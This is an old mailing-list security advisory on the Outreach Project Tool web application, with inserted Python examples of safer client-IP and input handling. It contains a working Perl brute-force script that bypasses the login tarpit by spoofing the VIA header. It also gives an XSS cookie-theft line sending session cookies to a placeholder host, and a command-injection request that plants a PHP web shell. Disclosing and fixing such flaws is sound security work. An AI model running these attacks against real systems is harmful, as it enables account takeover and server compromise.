Martin Eiszner
17/01/03, 20:58
to the list,
2003/01/16 @mei@websec.org
=====================================
Outreach Project Tool
=====================================
Product: O.P.T (Version opt_0.946b / Earlier versions may be vulnerable too)
Vendor: Lanifex (http://www.lanifex.com/business/business_en/products/815.html)
License: GPL
VendorStatus: Informed on Oct 2002
VendorStatus: ---
VendorPatch: ---
Local: NO
Remote: YES
Vulnerabilities:
1) Tarpit out-cheat (brute-force attack)
2) Cross-Site-Scripting
3) Setup
Tested Platforms: Linux / Slackware 8.0 i686 / Apache 1.3.*
Severity: MEDIUM
============
Introduction
============
The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementation. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consultants and their clients, as well as a wide range of other applications.
=====================
Vulnerability Details
=====================
SUMMARY
1) Request Header allows Tarpit - out-cheat
2) Multiple XSS-problems in community/forums
3) Setup (/opt/setup) permission issues
B) Description of Vulnerabilities
1) REQUEST-HEADER TARPIT - OUT-CHEAT
The function "OPT_remote_IP()" (/opt/general.php) accepts the "X_FORWARDED_FOR" and "VIA"
environment variables.
This is done to identify possible proxy servers.
Unfortunately these variables are derived from HTTP request headers, which the client controls.
With the following HTTP request:
---*---
GET /opt/whatever HTTP/1.1
Host: whatever
VIA: 1.2.3.4
---*---
"$HTTP_VIA" will be used as the user's IP address.
This leads to:
- Anonymous use of the application
- The possibility of a brute-force attack against accounts (the per-IP tarpit is bypassed by changing the header on each request)
Simple example for a brute-force attack against OPT:
---cut here---
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
my ($url,$uid,$pf) = @ARGV;
open(P,"< $pf") || die "passf.?\n";
my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
while(<P>){ my $pwd = $_; chomp($pwd);
my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
my $hds = $res->headers; my $new = $hds->header("Location");
my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
my $cod = $res2->code;
my $pag = $res2->content;
print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
close (P);
---cut here---
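To show the defender's side of the header-trust issue described above, here is an added Python example (not OPT's code, and not from the advisory) that contrasts a client-identity function with the advisory's behaviour against one that only honours X-Forwarded-For from a configured trusted proxy, and keys the login tarpit on the result. The trusted-proxy address, the lowercase header dictionary and the sample addresses are constructed for this example.

```python
import ipaddress

# Constructed for this example: the one reverse proxy this deployment operates.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def vulnerable_remote_ip(remote_addr, headers):
    """Mirrors the flaw in the advisory: a client-supplied X-Forwarded-For or
    Via value replaces the real peer address, so the tarpit key is attacker-chosen."""
    for name in ("x-forwarded-for", "via"):
        if headers.get(name):
            return headers[name].split(",")[0].strip()
    return remote_addr


def hardened_remote_ip(remote_addr, headers):
    """Trust X-Forwarded-For only when the TCP peer is one of our own proxies,
    then take the right-most hop that was not appended by us. Via is ignored:
    it names proxies, not clients, and is client-controlled anyway."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES:
        return str(peer)
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: nothing to the left of it can be trusted
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return str(peer)


class LoginTarpit:
    """Failed-login counter keyed on the hardened address, so rotating the
    Via header on every request no longer resets the count."""

    def __init__(self, threshold=5):
        self.threshold = threshold
        self.failures = {}

    def record_failure(self, remote_addr, headers):
        key = hardened_remote_ip(remote_addr, headers)
        self.failures[key] = self.failures.get(key, 0) + 1
        return self.failures[key]

    def is_throttled(self, remote_addr, headers):
        return self.failures.get(hardened_remote_ip(remote_addr, headers), 0) >= self.threshold
```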
2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others
Typical XSS vulnerabilities exist in many (if not most) of the community functions.
Example:
Once logged in, go to "Notes -> News -> Ad News"
and create a news item with script tags included:
---cut here---
hello i am a news thing .. bla bla ...
<script> alert(document.cookie); </script>
---cut here---
Now every user who views the news gets an alert window showing his own session ID (only as an example!!).
Of course it is possible to steal the OPT_Session cookie by making the script request
another URL where a so-called cookie-theft page is installed!!
(location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)
This vulnerability makes it possible, once logged in, to take over "any" other user's
account (administrator included!).
3) SETUP-ISSUES (/opt/setup)
If the lockfile "lock01" in the setup_lock directory is not removed due to
wrong permission settings, or someone is able/allowed to create a file "lock01",
it is possible to:
a) Create a new setup
b) Execute system commands through the setup.php script.
This is because the "temp_CRM_dir" parameter is passed directly to the PHP exec function.
Example GET-Request:
---cut here---
http://localhost/opt/setup/setup.php?
CRM_email=opti@localhost
&CRM_system_email=mei@localhost
&CRM_path=/disk2/apps/opt/OPT_0.946b/opt
&CRM_db_host=localhost&CRM_db_uname=opt
&CRM_db_pwd=opt
&CRM_db_db=opt
&CRM_may_demo=0
&temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
&CRM_mail_fname=OPT_incoming_mail
&action=Set up my OPT server
---cut here---
The request above creates a script called "bad.php" with the content <?passthru($c)?> in the
OPT setup directory!
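As an added Python example (not OPT's code, and not from the advisory), the following decodes the advisory's temp_CRM_dir value as the web server would hand it to the script, shows why splicing it into a shell command line yields a second command, and contrasts that with allow-list validation plus an argv list that never passes through a shell. The allowed parent directory and the "mkdir -p" command are assumptions standing in for whatever setup.php actually does with the directory.

```python
import os
import re
import urllib.parse
from pathlib import Path

# Assumption for this example: temporary directories may only live below here.
ALLOWED_PARENT = Path("/tmp")

# The advisory's temp_CRM_dir value, URL-decoded the way the server hands it to the script.
ADVISORY_PAYLOAD = urllib.parse.unquote_plus(
    "a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;"
)


def vulnerable_command(temp_dir):
    """The pattern the advisory describes: the raw parameter is spliced into a shell
    command line. Returned here, not executed; a ';' in the value becomes a second command."""
    return "mkdir -p " + temp_dir


def validate_temp_dir(value):
    """Allow-list the directory name before it gets near a process: absolute path,
    a small character set, no '..' segments, and confined to ALLOWED_PARENT."""
    if not re.fullmatch(r"/[A-Za-z0-9_./-]{1,200}", value):
        raise ValueError("temp dir contains characters outside the allow-list")
    if ".." in value.split("/"):
        raise ValueError("temp dir must not contain '..' segments")
    path = Path(os.path.normpath(value))
    if ALLOWED_PARENT not in path.parents:
        raise ValueError(f"temp dir must be below {ALLOWED_PARENT}")
    return path


def hardened_command(temp_dir):
    """Validated value passed as its own argv element: no shell, no string interpolation,
    so shell metacharacters in the input can never become a second command."""
    return ["mkdir", "-p", str(validate_temp_dir(temp_dir))]
```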
=======
Remarks
=======
---
====================
Recommended Hotfixes
====================
After installation, check whether the file "lock01" exists in the setup_lock directory.
If it does, remove it.
The other vulnerabilities can only be fixed by software patches.
EOF Martin Eiszner / @2002WebSec.org
=======
Contact
=======
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org